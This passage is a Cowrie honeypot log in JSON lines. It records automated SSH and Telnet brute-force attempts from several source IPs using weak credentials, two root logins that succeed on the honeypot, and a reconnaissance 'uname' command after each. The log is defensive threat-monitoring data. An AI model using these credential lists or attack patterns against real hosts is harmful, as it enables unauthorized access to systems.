],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:15:07.425083Z","src_ip":"83.168.105.65","session":"475b5b8a10c9"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123456","message":"login attempt [ftpuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:15:07.537978Z","src_ip":"83.168.105.65","session":"475b5b8a10c9"}
{"eventid":"cowrie.login.failed","username":"test","password":"321","message":"login attempt [test/321] failed","sensor":"my-vps","timestamp":"2025-08-26T12:15:07.761284Z","src_ip":"196.251.86.249","session":"f78d79cd7713"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:15:08.578701Z","src_ip":"83.168.105.65","session":"475b5b8a10c9"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.189","src_port":52308,"dst_ip":"1.2.3.4","dst_port":22,"session":"75bc6ff7e816","protocol":"ssh","message":"New connection: 93.123.109.189:52308 (1.2.3.4:22) [session: 75bc6ff7e816]","sensor":"my-vps","timestamp":"2025-08-26T12:15:08.745227Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:15:08.746326Z","src_ip":"93.123.109.189","session":"75bc6ff7e816"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T12:15:08.766450Z","src_ip":"93.123.109.189","session":"75bc6ff7e816"}
{"eventid":"cowrie.login.failed","username":"namada","password":"namada","message":"login attempt [namada/namada] failed","sensor":"my-vps","timestamp":"2025-08-26T12:15:08.827160Z","src_ip":"93.123.109.189","session":"75bc6ff7e816"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47016,"dst_ip":"1.2.3.4","dst_port":23,"session":"2441cc3314a3","protocol":"telnet","message":"New connection: 212.227.235.229:47016 (1.2.3.4:23) [session: 2441cc3314a3]","sensor":"my-vps","timestamp":"2025-08-26T12:15:08.898411Z"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:15:09.363321Z","src_ip":"196.251.86.249","session":"f78d79cd7713"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:15:09.848684Z","src_ip":"93.123.109.189","session":"75bc6ff7e816"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37386,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6f33d1d6022","protocol":"ssh","message":"New connection: 212.227.235.229:37386 (1.2.3.4:22) [session: a6f33d1d6022]","sensor":"my-vps","timestamp":"2025-08-26T12:15:11.514400Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:15:11.777660Z","src_ip":"212.227.235.229","session":"a6f33d1d6022"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:15:11.778441Z","src_ip":"212.227.235.229","session":"a6f33d1d6022"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456","message":"login attempt [ubuntu/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:15:13.701807Z","src_ip":"212.227.235.229","session":"a6f33d1d6022"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:15:14.898794Z","src_ip":"212.227.235.229","session":"a6f33d1d6022"}
{"eventid":"cowrie.session.closed","duration":13.269479513168335,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:15:22.167815Z","src_ip":"212.227.235.229","session":"2441cc3314a3"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":43724,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4186b9a3da4","protocol":"ssh","message":"New connection: 83.168.105.65:43724 (1.2.3.4:22) [session: c4186b9a3da4]","sensor":"my-vps","timestamp":"2025-08-26T12:15:23.063513Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:15:23.064242Z","src_ip":"83.168.105.65","session":"c4186b9a3da4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:15:23.104134Z","src_ip":"83.168.105.65","session":"c4186b9a3da4"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456","message":"login attempt [ubuntu/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:15:23.212744Z","src_ip":"83.168.105.65","session":"c4186b9a3da4"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:15:24.250359Z","src_ip":"83.168.105.65","session":"c4186b9a3da4"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":41914,"dst_ip":"1.2.3.4","dst_port":22,"session":"05a260514bba","protocol":"ssh","message":"New connection: 83.168.105.65:41914 (1.2.3.4:22) [session: 05a260514bba]","sensor":"my-vps","timestamp":"2025-08-26T12:15:38.743224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:15:38.744250Z","src_ip":"83.168.105.65","session":"05a260514bba"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:15:38.784526Z","src_ip":"83.168.105.65","session":"05a260514bba"}
{"eventid":"cowrie.login.success","username":"root","password":"QQ123456","message":"login attempt [root/QQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:15:38.907748Z","src_ip":"83.168.105.65","session":"05a260514bba"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:15:39.074772Z","src_ip":"83.168.105.65","session":"05a260514bba"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:15:39.075574Z","src_ip":"83.168.105.65","session":"05a260514bba"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:15:39.116802Z","src_ip":"83.168.105.65","session":"05a260514bba"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:15:39.117963Z","src_ip":"83.168.105.65","session":"05a260514bba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53852,"dst_ip":"1.2.3.4","dst_port":22,"session":"78b1ec59c7bd","protocol":"ssh","message":"New connection: 212.227.235.229:53852 (1.2.3.4:22) [session: 78b1ec59c7bd]","sensor":"my-vps","timestamp":"2025-08-26T12:15:45.551896Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:15:45.784936Z","src_ip":"212.227.235.229","session":"78b1ec59c7bd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:15:45.785619Z","src_ip":"212.227.235.229","session":"78b1ec59c7bd"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52190,"dst_ip":"1.2.3.4","dst_port":22,"session":"639a52c8e84d","protocol":"ssh","message":"New connection: 217.72.205.35:52190 (1.2.3.4:22) [session: 639a52c8e84d]","sensor":"my-vps","timestamp":"2025-08-26T12:15:47.035886Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:15:47.037116Z","src_ip":"217.72.205.35","session":"639a52c8e84d"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"password","message":"login attempt [ubuntu/password] failed","sensor":"my-vps","timestamp":"2025-08-26T12:15:47.789067Z","src_ip":"212.227.235.229","session":"78b1ec59c7bd"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:15:49.109812Z","src_ip":"212.227.235.229","session":"78b1ec59c7bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57332,"dst_ip":"1.2.3.4","dst_port":23,"session":"4173f877de05","protocol":"telnet","message":"New connection: 212.227.125.160:57332 (1.2.3.4:23) [session: 4173f877de05]","sensor":"my-vps","timestamp":"2025-08-26T12:15:51.933725Z"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":48476,"dst_ip":"1.2.3.4","dst_port":22,"session":"98ea3b3e2bb6","protocol":"ssh","message":"New connection: 83.168.105.65:48476 (1.2.3.4:22) [session: 98ea3b3e2bb6]","sensor":"my-vps","timestamp":"2025-08-26T12:15:54.270008Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:15:54.270893Z","src_ip":"83.168.105.65","session":"98ea3b3e2bb6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:15:54.310246Z","src_ip":"83.168.105.65","session":"98ea3b3e2bb6"}
{"eventid":"cowrie.login.failed","username":"esadmin","password":"esadmin","message":"login attempt [esadmin/esadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T12:15:54.429714Z","src_ip":"83.168.105.65","session":"98ea3b3e2bb6"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:15:55.471510Z","src_ip":"83.168.105.65","session":"98ea3b3e2bb6"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":37114,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d501f9cf750","protocol":"ssh","message":"New connection: 196.251.86.249:37114 (1.2.3.4:22) [session: 1d501f9cf750]","sensor":"my-vps","timestamp":"2025-08-26T12:16:05.129637Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:16:05.680138Z","src_ip":"196.251.86.249","session":"1d501f9cf750"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:16:05.681080Z","src_ip":"196.251.86.249","session":"1d501f9cf750"}
{"eventid":"cowrie.login.failed","username":"test","password":"test123","message":"login attempt [test/test123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:16:08.291622Z","src_ip":"196.251.86.249","session":"1d501f9cf750"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":50242,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ce2de501ad5","protocol":"ssh","message":"New connection: 83.168.105.65:50242 (1.2.3.4:22) [session: 4ce2de501ad5]","sensor":"my-vps","timestamp":"2025-08-26T12:16:09.669308Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:16:09.670791Z","src_ip":"83.168.105.65","session":"4ce2de501ad5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:16:09.709757Z","src_ip":"83.168.105.65","session":"4ce2de501ad5"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazxsw2","message":"login attempt [root/1qazxsw2] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:16:09.824805Z","src_ip":"83.168.105.65","session":"4ce2de501ad5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:16:09.965001Z","src_ip":"83.168.105.65","session":"4ce2de501ad5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:16:09.965877Z","src_ip":"83.168.105.65","session":"4ce2de501ad5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:16:10.019345Z","src_ip":"83.168.105.65","session":"4ce2de501ad5"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:16:10.025188Z","src_ip":"83.168.105.65","session":"4ce2de501ad5"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:16:10.124286Z","src_ip":"196.251.86.249","session":"1d501f9cf750"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42702,"dst_ip":"1.2.3.4","dst_port":22,"session":"34a6d8766662","protocol":"ssh","message":"New connection: 212.227.235.229:42702 (1.2.3.4:22) [session: 34a6d8766662]","sensor":"my-vps","timestamp":"2025-08-26T12:16:20.225898Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:16:20.491247Z","src_ip":"212.227.235.229","session":"34a6d8766662"}
